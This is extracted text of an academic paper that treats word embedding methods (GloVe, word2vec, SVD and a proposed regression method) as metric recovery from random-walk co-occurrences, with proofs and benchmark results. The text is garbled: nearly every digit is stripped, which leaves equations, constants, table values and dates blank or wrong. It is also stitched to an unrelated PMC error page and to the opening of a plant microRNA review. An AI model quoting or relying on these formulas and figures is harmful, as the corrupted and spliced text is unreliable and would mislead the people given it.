recov- ery of semantic spaces since the notion of semantic spaces and the associated parallelogram rule for ana- logical reasoning extend naturally to objects other than words. for example, images can be approxi- mately viewed as points in an euclidean semantic space by representing them in terms of their under- lying degrees of freedom (e.g. orientation, illumina- tion). thus, questions about the underlying seman- tic spaces and how they can be recovered should be related. the problem of recovering an intrinsic euclidean coordinate system over objects has been specifically addressed in manifold learning. for example, meth- ods such as isomap (tenenbaum et al., ) re- constitute an euclidean space over objects (when possible) based on local comparisons. intuitively, these methods assume that naive distance metrics such as the l distance over pixels in an image may be meaningful only when images are very sim- ilar. longer distances between objects are evaluated through a series of local comparisons. these longer distances—geodesic distances over the manifold— can be approximated by shortest paths on a neigh- borhood graph. if we view the geodesic distances on the manifold (represented as a graph) as seman- tic distances, then the goal is to isometrically embed these distances into an euclidean space. tenenbaum ( ) showed that such isometric embeddings of image manifolds can be used to solve “visual analo- gies” via the parallelogram rule. typical approaches to manifold learning as dis- cussed above differ from word embedding in terms of how the semantic distances between objects are extracted. word embeddings approximate semantic distances between words using the negative log co- occurrence counts (section ), while manifold learn- ing approximates semantic distances using neigh- borhood graphs built from local comparisons of the original, high-dimensional points. both views seek to estimate a latent geodesic distance. in order to study the problem of metric recov- ery from co-occurrence counts, and to formalize the connection between word embedding and manifold learning, we introduce a simple random walk model over the underlying objects (e.g. words or images). this toy model permits us to establish clean consis- tency results for recovery algorithms. we emphasize that while the random walk is introduced over the words, it is not intended as a model of language but rather as a tool to understand the recovery problem. . random walk model consider now a simple metric random walk xt over words where the probability of transitioning from word i to word j is given by p(xt = j|xt− = i) = h( σ||xi −xj|| ) ( ) here ||xi −xj|| is the euclidean distance between words in the underlying semantic space to be recov- ered, and h is some unknown, sub-gaussian func- tion linking semantic similarity to co-occurrence. under this model, the log frequency of occur- rences of word j immediately after word i will be proportional to log(h(||xi −xj|| /σ)) as the corpus size grows large. here we make the surprising ob- servation that if we consider co-occurrences over a sufficiently large window, the log co-occurrence in- stead converges to −||xi−xj|| /σ, i.e. it directly re- lates to the underlying metric. intuitively, this result is an analog of the central limit theorem for random walks. note that, for this reason, we do not need to know the link function h. formally, given an m-token corpus consisting of sentences generated according to equation from a this toy model ignores the role of syntax and function words, but these factors can be included as long as the moment bounds originally derived in hashimoto et al. ( b) remain fulfilled. vocabulary of size n, let cm,nij (tn) be the number of times word j occurs tn steps after word i in the corpus. we can show that there exist unigram nor- malizers am,ni ,b m,n i such that the following holds: lemma . given a corpus generated by equation there exists ai and bj such that simultaneously over all i,j: lim m,n→∞ − log(cm,nij (tn))−a m,n i −b m,n j →||xi−xj|| . we defer the precise statement and conditions of lemma to corollary . conceptually, this lim- iting result captures the intuition that while one- step transitions in a sentence may be complex and include non-metric structure expressed in h, co- occurrences over large windows relate directly to the latent semantic metric. for ease of notation, we henceforth omit the corpus and vocabulary size descriptors m,n (using cij, ai, and bj in place of c m,n ij (tn), a m,n i , and b m,n j ), since in practice the cor- pus is large but fixed. lemma serves as the basis for establishing con- sistency of recovery for word embedding algorithms (next section). it also allows us to establish a precise link between between manifold learning and word embedding, which we describe in the remainder of this section. . connection to manifold learning let {v . . .vn} ∈ rd be points drawn i.i.d. from a density p, where d is the dimension of observed inputs (e.g. number of pixels, in the case of im- ages), and suppose that these points lie on a mani- fold m⊂ rd that is isometrically embeddable into d < d dimensions, where d is the intrinsic dimen- sionality of the data (e.g. coordinates representing illumination or camera angle in the case of images). the problem of manifold learning consists of finding an embedding of v . . .vn into rd that preserves the structure of m by approximately preserving the dis- tances between points along this manifold. in light the window-size tn depends on the vocabulary size to en- sure that all word pairs have nonzero co-occurrence counts in the limit of large vocabulary and corpus. for details see the definition of gn in appendix a. in lemma , we take m → ∞ (growing corpus size) to ensure all word pairs appear sufficiently often, and n → ∞ (growing vocabulary) to ensure that every point in the semantic space has a nearby word. of lemma , this problem can be solved with word embedding algorithms in the following way: . construct a neighborhood graph (e.g. connect- ing points within a distance ε) over {v . . .vn}. . record the vertex sequence of a simple random walk over these graphs as a sentence, and con- catenate these sequences initialized at different nodes into a corpus. . use a word embedding method on this cor- pus to generate d-dimensional vector represen- tations of the data. under the conditions of lemma , the negative log co-occurrences over the vertices of the neigh- borhood graph will converge, as n → ∞, to the geodesic distance (squared) over the manifold. in this case we will show that the globally optimal so- lutions of word embedding algorithms recover the low dimensional embedding (section ). recovering semantic distances with word embeddings we now show that, under the conditions of lemma , three popular word embedding methods can be viewed as doing metric recovery from co-occurrence counts. we use this observation to derive a new, sim- ple word embedding method inspired by lemma . . word embeddings as metric recovery glove the global vectors (glove) (pennington et al., ) method for word embedding optimizes the objective function min x̂,ĉ,a,b ∑ i,j f(cij)( 〈x̂i, ĉj〉 + ai + bj − log(cij)) with f(cij) = min(cij, ) / . if we rewrite the bias terms as ai = âi −||x̂i|| and bj = b̂j −||ĉj|| , we obtain the equivalent representation: min x̂,ĉ,â,̂b ∑ i,j f(cij)(− log(cij)−||x̂i−ĉj|| +âi+b̂j)) . together with lemma , we recognize this as a weighted multidimensional scaling (mds) objective this approach of applying random walks and word embed- dings to general graphs has already been shown to be surpris- ingly effective for social networks (perozzi et al., ), and demonstrates that word embeddings serve as a general way to connect metric random walks to embeddings. with weights f(cij). splitting the word vector x̂i and context vector ĉi is helpful in practice but not necessary under the assumptions of lemma since the true embedding x̂i = ĉi = xi/σ and âi, b̂i = is a global minimum whenever dim(x̂) = d. in other words, glove can recover the true metric provided that we set d correctly. word vec the skip-gram model of word vec approximates a softmax objective: min x̂,ĉ ∑ i,j cij log ( exp(〈x̂i, ĉj〉)∑n k= exp(〈x̂i, ĉk〉) ) . without loss of generality, we can rewrite the above with a bias term bj by making dim(x̂) = d + and setting one of the dimensions of x̂ to . by re- defining the bias b̂j = bj − ||ĉj|| / , we see that word vec solves min x̂,ĉ,̂b ∑ i,j cij log ( exp(− ||x̂i − ĉj|| + b̂j)∑n k= exp(− ||x̂i − ĉk|| + b̂k) ) . since according to lemma cij/ ∑n k= cik approaches exp(−‖|xi−xj|| /σ )∑n k= exp(−‖|xi−xk|| /σ ) , this is the stochastic neighbor embedding (sne) (hinton and roweis, ) objective weighted by ∑n k= cik. the global optimum is achieved by x̂i = ĉi = xi( √ /σ) and b̂j = (see theorem ). the neg- ative sampling approximation used in practice be- haves much like the svd approach of levy and goldberg ( b), and by applying the same sta- tionary point analysis as they do, we show that in the absence of a bias term the true embedding is a global minimum under the additional assumption that ||xi|| ( /σ ) = log( ∑ j cij/ √∑ ij cij) (hin- ton and roweis, ). svd the method of levy and goldberg ( b) uses the log pmi matrix defined in terms of the uni- gram frequency ci as: mij = log(cij)−log(ci)−log(cj) + log (∑ j cj ) and computes the svd of the shifted and truncated matrix: (mij + τ)+ where τ is a truncation param- eter to keep mij finite. under the limit of lemma , the corpus is sufficiently large that no truncation is necessary (i.e. τ = −min(mij) < ∞). we will recover the underlying embedding if we additionally assume σ ||xi|| = log(ci/ √∑ j cj) via the law of large numbers since mij → 〈xi,xj〉 (see theorem ). centering the matrix mij before obtaining the svd would relax the norm assumption, resulting ex- actly in classical mds (sibson, ). . metric regression from log co-occurrences we have shown that by simple reparameterizations and use of lemma , existing embedding algo- rithms can be interpreted as consistent metric recov- ery methods. however, the same lemma suggests a more direct regression method for recovering the la- tent coordinates, which we propose here. this new embedding algorithm serves as a litmus test for our metric recovery paradigm. lemma describes a log-linear relationship be- tween distance and co-occurrences. the canonical way to fit this relationship would be to use a general- ized linear model, where the co-occurrences follow a negative binomial distribution cij ∼ negbin(θ,p), where p = θ/[θ + exp(− ||xi −xj|| + ai + bj)]. under this overdispersed log linear model, e[cij] = exp(− ||xi −xj|| + ai + bj) var(cij) = e[cij] /θ + e[cij] here, the parameter θ controls the contribution of large cij, and is akin to glove’s f(cij) weight function. fitting this model is straightforward if we define the log-likelihood in terms of the expected rate λij = exp(− ||xi −xj|| + ai + bj) as: ll(x,a,b,θ) = ∑ i,j θ log(θ) −θ log(λij + θ)+ cij log ( − θ λij +θ ) + log ( Γ(cij +θ) Γ(θ)Γ(cij + ) ) to generate word embeddings, we minimize the negative log-likelihood using stochastic gradient de- scent. the implementation mirrors that of glove and randomly selects word pairs i,j and attracts or repulses the vectors x̂ and ĉ in order to achieve the relationship in lemma . implementation details are provided in appendix c. relationship to glove the overdispersion pa- rameter θ in our metric regression model sheds light on the role of glove’s weight function f(cij). tak- ing the taylor expansion of the log-likelihood at log(λij) ≈− log(cij), we have ll(x,a,b,θ) = ∑ ij kij− cijθ (cij +θ) (uij) +o ( (uij) ) , where uij = (log λij − log cij) and kij does not depend on x. note the similarity of the sec- ond order term with the glove objective. as cij grows, the weight functions cijθ (cij +θ) and f(cij) = max(cij,xmax) / converge to θ/ and xmax re- spectively, down-weighting large co-occurrences. empirical validation we will now experimentally validate two aspects of our theory: the semantic space hypothesis (sections and ), and the correspondence between word em- bedding and manifold learning (sections and ). our goal with this empirical validation is not to find the absolute best method and evaluation metric for word embeddings, which has been studied before (e.g. levy et al. ( )). instead, we provide empir- ical evidence in favor of the semantic space hypoth- esis, and show that our simple algorithm for metric recovery is competitive with the state-of-the-art on both semantic induction tasks and manifold learn- ing. since metric regression naturally operates over integer co-occurrences, we use co-occurrences over unweighted windows for this and—for fairness—for the other methods (see appendix c for details). . datasets corpus and training: we used three different corpora for training: a wikipedia snapshot of / ( . b tokens), the original word vec cor- pus (mikolov et al., a) ( . b tokens), and a combination of wikipedia with gigaword emulat- ing glove’s corpus (pennington et al., ) ( . b tokens). we preprocessed all corpora by removing punctuation, numbers and lower-casing all the text. the vocabulary was restricted to the k most fre- quent words in each corpus. we trained embeddings using four methods: word vec, glove, random- ized svd, and metric regression (referred to as re- gression). full implementation details are provided in the appendix. we used randomized, rather than full svd due to the diffi- culty of scaling svd to this problem size. for performance of full svd factorizations see levy et al. ( ). google semantic google syntactic google total sat classification sequence method l cos l cos l cos l cos l cos l cos regression . . . . . . . . . . . . glove . . . . . . . . . . . . svd . . . . . . . . . . . . word vec . . . . . . . . . . . . table : accuracies on google, sat analogies and on two new inductive reasoning tasks. manifold learning word embedding semantic . . syntactic . . total . . table : semantic similarity alone can solve the google analogy tasks for fairness we fix all hyperparameters, and de- velop and test the code for metric regression exclu- sively on the first gb subset of the wiki dataset. for open-vocabulary tasks, we restrict the set of an- swers to the top k words, since this improves per- formance while covering the majority of the ques- tions. in the following, we show performance for the glove corpus throughout but include results for all corpora along with our code package. evaluation tasks: we test the quality of the word embeddings on three types of inductive tasks: analo- gies, sequence completion and classification (figure ). for the analogies, we used the standard open- vocabulary analogy task of mikolov et al. ( a) (henceforth denoted google), consisting of , semantic and syntactic questions. in addition, we use the more difficult sat analogy dataset (ver- sion ) (turney and littman, ), which contains questions from actual exams and guidebooks. each question consists of exemplar pairs of words word :word , where the same relation holds for all pairs. the task is to pick from among another five pairs of words the one that best fits the category im- plicitly defined by the exemplars. inspired by sternberg and gardner ( ), we propose two new difficult inductive reasoning tasks beyond analogies to verify the semantic space hy- pothesis: sequence completion and classification. as described in section , the former involves choosing the next step in a semantically coherent sequence of words (e.g. hour,minute, . . .), and the latter consists of selecting an element within the same category out of five possible choices. given the lack of publicly available datasets, we generated our own questions using wordnet (fellbaum, ) relations and word-word pmi values. these datasets were constructed before training the embeddings, so as to avoid biasing them towards any one method. for the classification task, we created in-category words by selecting words from wordnet relations associated to root words, from which we pruned to four words based on pmi-similarity to the other words in the class. additional options for the mul- tiple choice questions were created searching over words related to the root by a different relation type, and selecting those most similar to the root. for the sequence completion task, we obtained wordnet trees of various relation types, and pruned these based on similarity to the root word to obtain the sequence. for the multiple-choice questions, we proceeded as before to select additional (incorrect) options of a different relation type to the root. after pruning, we obtain classification ques- tions and sequence completion questions, of which are open-vocabulary and are multiple choice. these two new datasets are available . . results on inductive reasoning tasks solving analogies using survey data alone: we demonstrate that, surprisingly, word embeddings trained directly on semantic similarity derived from survey data can solve analogy tasks. extending a study by rumelhart and abrahamson ( ), we use a free-association dataset (nelson et al., ) to construct a similarity graph, where vertices cor- respond to words and the weights wij are given by the number of times word j was considered most similar to word i in the survey. we take the largest connected component of this graph (consisting of words and weights) and embed it us- ing isomap for which squared edge distances are de- fined as − log(wij/ maxkl(wkl)). we use the result- http://web.mit.edu/thashim/www/supplement materials.zip figure : dimensionality reduction using word embedding and manifold learning. performance is quantified by percentage of -nearest neighbors sharing the same digit label. ing vectors as word embeddings to solve the google analogy task. the results in table show that em- beddings obtained with isomap on survey data can outperform the corpus based metric regression vec- tors on semantic, but not syntactic tasks. we hypoth- esize that free-association surveys capture semantic, but not syntactic similarity between words. analogies: the results on the google analogies shown in table demonstrate that our proposed framework of metric regression and l distance is competitive with the baseline of word vec with cosine distance. the performance gap across meth- ods is small and fluctuates across corpora, but met- ric regression consistently outperforms glove on most tasks and outperforms all methods on seman- tic analogies, while word vec does better on syn- tactic categories. for the sat dataset, the l dis- tance performs better than the cosine similarity, and we find word vec to perform best, followed by metric regression. the results on these two analogy datasets show that directly embedding the log co- occurrence metric and taking l distances between vectors is competitive with current approaches to analogical reasoning. sequence and classification tasks: as predicted by the semantic field hypothesis, word embeddings perform well on the two novel inductive reasoning tasks (table ). again, we observe that the metric recovery with metric regression coupled with l dis- tance consistently performs as well as and often bet- ter than the current state-of-the-art word embedding methods on these two additional semantic datasets. . word embeddings can embed manifolds in section we proposed a reduction for solving manifold learning problems with word embeddings which we show achieves comparable performance to manifold learning methods. we now test this rela- tion by performing nonlinear dimensionality reduc- tion on the mnist digit dataset, reducing from d = to two dimensions. using a four-thousand im- age subset, we construct a k-nearest neighbor graph (k = ) and generate simple random walks of length starting from each vertex in the graph, re- sulting in , sentences of length each. we compare the four word embedding methods against standard dimensionality reduction methods: pca, isomap, sne and, t-sne. we evaluate the meth- ods by clustering the resulting low-dimensional data and computing cluster purity, measured using the percentage of -nearest neighbors having the same digit label. the resulting embeddings, shown in fig. , demonstrate that metric regression is highly effective at this task, outperforming metric sne and beaten only by t-sne ( % cluster purity), which is a visualization method specifically designed to pre- serve cluster separation. all word embedding meth- ods including svd ( %) embed the mnist digits remarkably well and outperform baselines of pca ( %) and isomap ( %). discussion our work recasts word embedding as a metric recov- ery problem pertaining to the underlying semantic space. we use co-occurrence counts from random walks as a theoretical tool to demonstrate that exist- ing word embedding algorithms are consistent met- ric recovery methods. our direct regression method is competitive with the state of the art on various se- mantics tasks, including two new inductive reason- ing problems of series completion and classification. our framework highlights the strong interplay and common foundation between word embedding methods and manifold learning, suggesting several avenues for recovering vector representations of phrases and sentences via properly defined markov processes and their generalizations. appendix a metric recovery from markov processes on graphs and manifolds consider an infinite sequence of points xn = {x , . . . ,xn}, where xi are sampled i.i.d. from a density p(x) over a compact riemannian manifold equipped with a geodesic metric ρ. for our pur- poses, p(x) should have a bounded log-gradient and a strict lower bound p over the manifold. the ran- dom walks we consider are over unweighted spatial graphs defined as definition (spatial graph). let σn : xn → r> be a local scale function and h : r≥ → [ , ] a piecewise continuous function with sub-gaussian tails. a spatial graph gn corresponding to σn and h is a random graph with vertex set xn and a di- rected edge from xi to xj with probability pij = h(ρ(xi,xj) /σn(xi) ). simple examples of spatial graphs where the con- nectivity is not random include the ε ball graph (σn(x) = ε) and the k-nearest neighbor graph (σn(x) =distance to k-th neighbor). log co-occurrences and the geodesic will be con- nected in two steps. ( ) we use known results to show that a simple random walk over the spatial graph, properly scaled, behaves similarly to a dif- fusion process; ( ) the log-transition probability of a diffusion process will be related to the geodesic metric on a manifold. ( ) the limiting random walk on a graph: just as the simple random walk over the integers con- verges to a brownian motion, we may expect that under specific constraints the simple random walk xnt over the graph gn will converge to some well- defined continuous process. we require that the scale functions converge to a continuous function σ̄ (σn(x)g− n a.s.−−→ σ̄(x)); the size of a single step van- ish (gn → ) but contain at least a polynomial num- ber of points within σn(x) (gnn d+ log(n) − d+ → ∞). under this limit, our assumptions about the density p(x), and regularity of the transitions , the for t = Θ(g− n ), the marginal distribution np(xt|x ) must be a.s. uniformly equicontinuous. for undirected spatial graphs, this is always true (croydon and hambly, ), but for directed graphs it is an open conjecture from (hashimoto et al., b). following holds: theorem ((hashimoto et al., b; ting et al., )). the simple random walk xnt on gn con- verges in skorokhod space d([ ,∞),d) after a time scaling t̂ = tg n to the itô process yt̂ valued in c([ ,∞),d) as xn t̂g− n → yt̂. the process yt̂ is de- fined over the normal coordinates of the manifold (d,g) with reflecting boundary conditions on d as dyt̂ = ∇ log(p(yt̂))σ(yt̂) dt̂ + σ(yt̂)dwt̂ ( ) the equicontinuity constraint on the marginal densities of the random walk implies that the tran- sition density for the random walk converges to its continuum limit. lemma (convergence of marginal densities). (hashimoto et al., a) let x be some point in our domain xn and define the marginal densities q̂t(x) = p(yt = x|y = x ) and qtn (x) = p(xnt = x|xn = x ). if tng n = t̂ = Θ( ), then under condition (?) and the results of theorem such that xnt → y nt weakly, we have lim n→∞ nqtn (x) = q̂t̂(x)p(x) − . ( ) log transition probability as a metric we may now use the stochastic process yt̂ to connect the log transition probability to the geodesic distance using varadhan’s large deviation formula. theorem ((varadhan, ; molchanov, )). let yt be a itô process defined over a complete riemann manifold (d,g) with geodesic distance ρ(xi,xj) then lim t→ −t log(p(yt = xj|y = xi)) → ρ(xi,xj) . this estimate holds more generally for any space admitting a diffusive stochastic process (saloff- coste, ). taken together, we finally obtain: corollary (varadhan’s formula on graphs). for any δ,γ,n there exists some t̂, n > n , and se- quence bnj such that the following holds for the sim- ple random walk xnt : p ( sup xi,xj∈xn ∣∣∣t̂ log(p(xn t̂g− n = xj | xn = xi)) − t̂bnj −ρσ(x)(xi,xj) ∣∣∣ > δ ) < γ where ρσ(x) is the geodesic defined as ρσ(x)(xi,xj) = min f∈c :f( )=xi,f( )=xj ∫ σ(f(t))dt proof. the proof is in two parts. first, by varad- han’s formula (theorem , (molchanov, , eq. . )) for any δ > there exists some t̂ such that: sup y,y′∈d |−t̂ log(p(yt̂ = y ′|y = y))−ρσ(x)(y′,y) | < δ the uniform equicontinuity of the marginals implies their uniform convergence (lemma s ), so for any δ > and γ , there exists a n such that p( sup xj,xi∈xn |p(yt̂ = xj|y = xi) −np(xj)p(xng− n t̂ = xj|x n = xi)| > δ ) < γ by the lower bound on p and compactness of d, p(yt̂|y ) is lower bounded by some strictly positive constant c and we can apply uniform continuity of log(x) over (c,∞) to get that for some δ and γ, p ( sup xj,xi∈xn | log(p(yt̂ = xj|y = xi))−log(np(xj)) − log(p(xn g− n t̂ = xj|xn = xi))| > δ ) < γ. ( ) finally we have the bound, p ( sup xi,xj∈xn |− t̂ log(p(xn g− n t̂ = xj|xn = xi)) −t̂ log(np(xj))−ρσ(x)(xi,xj) | > δ +t̂δ ) < γ to combine the bounds, given some δ and γ, set bnj = log(np(xj)), pick t̂ such that δ < δ/ , then pick n such that the bound in eq. holds with prob- ability γ and error δ < δ/( t̂). b consistency proofs for word embedding lemma (consistency of svd). assume the norm of the latent embedding is proportional to the uni- gram frequency ||xi||/σ = ci/( ∑ j cj) under these conditions, let x̂ be the embedding de- rived from the svd of mij as x̂x̂t = mij = log(cij) − log ( ci ) − log ( cj ) + log (∑ i ci ) + τ. then there exists a τ such that this embedding is close to the true embedding under the same equiva- lence class as lemma s p (∑ i ||ax̂i/σ −xj|| > δ ) < ε. proof. by corollary for any δ > and ε > there exists a m such that p(sup i,j |− log(cij) − (||xi −xj|| /σ ) − log(mc)| > δ ) < ε . now additionally, if ci/ √∑ j cj = ||xi|| /σ then we can rewrite the above bound as p(sup i,j | log(cij)−log(ci)−log(cj)+log( ∑ i ci) − 〈xi,xj〉/σ − log(mc)| > δ ) < ε . and therefore, p(sup i,j |mij − 〈xi,xj〉/σ − log(mc)| > δ ) < ε . given that the dot product matrix has error at most δ , the resulting embedding it known to have at most√ δ error (sibson, ). this completes the proof, since we can pick τ = − log(mc), δ = δ and ε = ε. theorem (consistency of softmax/word vec). define the softmax objective function with bias as g(x̂, ĉ, b̂) = ∑ ij cij log exp(−||x̂i − ĉj|| + b̂j)∑n k= exp(−||x̂i − ĉk|| + b̂k) define xm,cm,bm as the global minima of the above objective function for a co-occurrence cij over a corpus of size m. for any ε > and δ > there exists some m such that p(|g( x σ , x σ , ) −g(xm,cm,bm)| > δ) < ε proof. by differentiation, any objective of the form min λij cij log ( exp(−λij)∑ k exp(−λik) ) has the minima λ∗ij = − log(cij) + ai up to un-identifiable ai with objective function value cij log(cij/ ∑ k cik). this gives a global function lower bound g(xm,cm,bm) ≥ ∑ ij cij log ( cij∑ k cik ) ( ) now consider the function value of the true embed- ding x σ ; g( x σ , x σ , ) = ∑ ij cij log exp(− σ ||xi −xj|| )∑ k exp(− σ ||xi −xk|| ) = ∑ ij cij log ( exp(log(cij) + δij + ai)∑ k exp(log(cik) + δik + ai) ) . we can bound the error variables δij using corol- lary as supij |δij| < δ with probability ε for sufficiently large m with ai = log(mi) − log( ∑n k= exp(−||xi −xk|| /σ )). taking the taylor expansion at δij = , we have g( x σ , x σ , ) = ∑ ij cij log cij∑ k cik + n∑ l= cil∑ k cikδil + o(||δ|| ) by the law of large numbers of cij, p (∣∣∣g( xσ, x σ , )− ∑ ij cij log ( cij∑ k cik )∣∣∣ > nδ ) < ε which combined with ( ) yields p(|g( x σ , x σ , ) −g(x,c,b)| > nδ ) < ε . to obtain the original theorem statement, take m to fulfil δ = δ/n and ε = ε. note that for word vec with negative-sampling, applying the stationary point analysis of levy and goldberg ( b) combined with the analysis in lemma s shows that the true embedding is a global minimum. c empirical evaluation details c. implementation details we used off-the-shelf implementations of word vec and glove . the two other methods (randomized) svd and regression embed- ding are both implemented on top of the glove codebase. we used -dimensional vectors and window size in all models. further details are provided below. http://code.google.com/p/word vec http://nlp.stanford.edu/projects/glove word vec. we used the skip-gram version with negative samples, iterations, α = . and fre- quent word sub-sampling with a parameter of − . glove. we disabled glove’s corpus weighting, since this generally produced superior results. the default step-sizes results in nan-valued embed- dings, so we reduced them. we used xmax = , η = . and iterations. svd. for the svd algorithm of levy and gold- berg ( b), we use the glove co-occurrence counter combined with a parallel randomized pro- jection svd factorizer, based upon the redsvd li- brary due to memory and runtime constraints. fol- lowing levy et al. ( ), we used the square root factorization, no negative shifts (τ = in our nota- tion), and , random projections. regression embedding. we use standard sgd with two differences. first, we drop co-occurrence values with probability proportional to − cij/ when cij < , and scale the gradient, which re- sulted in training time speedups with no loss in ac- curacy. second, we use an initial line search step combined with a linear step size decay by epoch. we use θ = and η is line-searched starting at η = . c. solving inductive reasoning tasks the ideal point for a task is defined below: • analogies: given a:b::c, the ideal point is given by b −a + c (parallelogram rule). • analogies (sat): given prototype a:b and candidates c : d . . .cn : dn, we compare di −ci to the ideal point b −a. • categories: given a category implied by w , . . . ,wn, the ideal point is i = n ∑n i= wi. • sequence: given sequence w : · · · : wn we compute the ideal as i = wn + n (wn −w ). once we have the ideal point i, we pick the answer as the word closest to i among the options, using l or cosine distance. for the latter, we normalize i to unit norm before taking the cosine distance. for l we do not apply any normalization. https://github.com/ntessore/redsvd-h references sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . random walks on con- text spaces: towards an explanation of the myster- ies of semantic word embeddings. arxiv preprint arxiv: . . kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. computational linguistics, ( ): – . david a croydon and ben m hambly. . local limit theorems for sequences of simple random walks on graphs. potential analysis, ( ): – . christiane fellbaum, editor. . wordnet: an elec- tronic lexical database. thomas l griffiths, mark steyvers, and joshua b tenen- baum. . topics in semantic representation. psy- chological review, ( ): . zellig s harris. . distributional structure. word, ( ): – . tatsunori hashimoto, yi sun, and tommi jaakkola. a. from random walks to distances on un- weighted graphs. in advances in neural information processing systems. tatsunori hashimoto, yi sun, and tommi jaakkola. b. metric recovery from directed unweighted graphs. in artificial intelligence and statistics, pages – . geoffrey e hinton and sam t roweis. . stochastic neighbor embedding. in advances in neural informa- tion processing systems, pages – . matthäus kleindessner and ulrike von luxburg. . dimensionality estimation without distances. in pro- ceedings of the artificial intelligence and statistics conference (aistats). omer levy and yoav goldberg. a. linguistic regularities in sparse and explicit word representa- tions. in proceedings th conference on computa- tional natural language learning, pages – . omer levy and yoav goldberg. b. neural word embedding as implicit matrix factorization. in ad- vances in neural information processing systems, pages – . omer levy, yoav goldberg, and ido dagan. . im- proving distributional similarity with lessons learned from word embeddings. transactions of the associa- tion for computational linguistics, : – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. in iclr workshop. tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems, pages – . sa molchanov. . diffusion processes and rie- mannian geometry. russian mathematical surveys, ( ): . douglas l nelson, cathy l mcevoy, and thomas a schreiber. . the university of south florida free association, rhyme, and word fragment norms. be- havior research methods, instruments, & computers, ( ): – . jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word rep- resentation. in proceedings of the empiricial methods in natural language processing, pages – . bryan perozzi, rami al-rfou, and steven skiena. . deepwalk: online learning of social representations. in proceedings of the th acm sigkdd interna- tional conference on knowledge discovery and data mining, pages – . acm. david e rumelhart and adele a abrahamson. . a model for analogical reasoning. cognitive psychol- ogy, ( ): – . laurent saloff-coste. . the heat kernel and its es- timates. probabilistic approach to geometry, : – . gideon schwarz and amos tversky. . on the reci- procity of proximity relations. journal of mathemati- cal psychology, ( ): – . robin sibson. . studies in the robustness of multidi- mensional scaling: perturbational analysis of classical scaling. journal of the royal statistical society. series b (methodological), pages – . richard socher, john bauer, christopher d manning, and andrew y ng. . parsing with compositional vec- tor grammars. in proceedings of the acl conference. robert j sternberg and michael k gardner. . uni- ties in inductive reasoning. journal of experimental psychology: general, ( ): . joshua b tenenbaum, vin de silva, and john c langford. . a global geometric framework for nonlinear dimensionality reduction. science, ( ): – . joshua b tenenbaum. . mapping a manifold of per- ceptual observations. in advances in neural informa- tion processing systems, pages – . daniel ting, ling huang, and michael jordan. . an analysis of the convergence of graph laplacians. arxiv preprint arxiv: . . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . acl. peter d turney and michael l littman. . corpus- based learning of analogies and semantic relations. machine learning, ( - ): – . amos tversky and j hutchinson. . nearest neigh- bor analysis of psychological spaces. psychological review, ( ): . srinivasa rs varadhan. . diffusion processes in a small time interval. communications on pure and applied mathematics, ( ): – . wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ submitted april accepted october published november corresponding author indika kahanda, indika.kahanda@montana.edu academic editor christopher mungall additional information and declarations can be found on page doi . /peerj-cs. copyright manuweera et al. distributed under creative commons cc-by . open access computational methods for the ab initio identification of novel microrna in plants: a systematic review buwani manuweera , gillian reynolds , and indika kahanda gianforte school of computing, montana state university, bozeman, mt, united states of america department of plant sciences and plant pathology, montana state university, bozeman, mt, united states of america abstract background. micrornas (mirnas) play a vital role as post-transcriptional regulators in gene expression. experimental determination of mirna sequence and structure is both expensive and time consuming. the next-generation sequencing revolution, which facilitated the rapid accumulation of biological data has brought biology into the ‘‘big data’’ domain. as such, developing computational methods to predict mirnas has become an active area of inter-disciplinary research. objective. the objective of this systematic review is to focus on the developments of ab initio plant mirna identification methods over the last decade. data sources. five databases were searched for relevant articles, according to a well- defined review protocol. study selection. the search results were further filtered using the selection criteria that only included studies on novel plant mirna identification using machine learning. data extraction. relevant data from each study were extracted in order to carry out an analysis on their methodologies and findings. results. results depict that in the last decade, there were articles published on novel mirna identification methods in plants of which only of them were primarily focused on plant microrna identification. our findings suggest a need for more stringent plant-focused mirna identification studies. conclusion. overall, the study accuracies are of a satisfactory level, although they may generate a considerable number of false negatives. in future, attention must be paid to the biological plausibility of computationally identified mirnas to prevent further propagation of biologically questionable mirna sequences. subjects bioinformatics, computational biology keywords ab initio, microrna, plant, machine learning, systematic review introduction micrornas (mirnas) are a large family of small (approx. – nucleotides) single- stranded rnas, involved in post-transcriptional gene regulation through the cleavage and/or inhibition of target mrnas (rogers & chen, ; voinnet, ). despite being found throughout the eukaryotic kingdom, plant micrornas differ from their metazoan counterparts in a number of ways, including their genomic loci (regions in which their genes can be found i.e., introns, utrs, etc.), biogenesis, length, methods of target recognition how to cite this article manuweera b, reynolds g, kahanda i. . computational methods for the ab initio identification of novel mi- crorna in plants: a systematic review. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:indika.kahanda@montana.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. and number of targets per mirna molecule (axtell, westholm & lai, ; moran et al., ). computationally, plant and animal mirnas can be differentiated through several distinguishing characteristics such as helix number, stack number, length of pre-mirna and minimum free energy (zhu et al., ). indeed, it is currently uncertain if plant and animal micrornas share a common origin or if they evolved independently in both lineages (axtell, westholm & lai, ; moran et al., ; zhang et al., ). despite the uncertainty regarding their origin, it 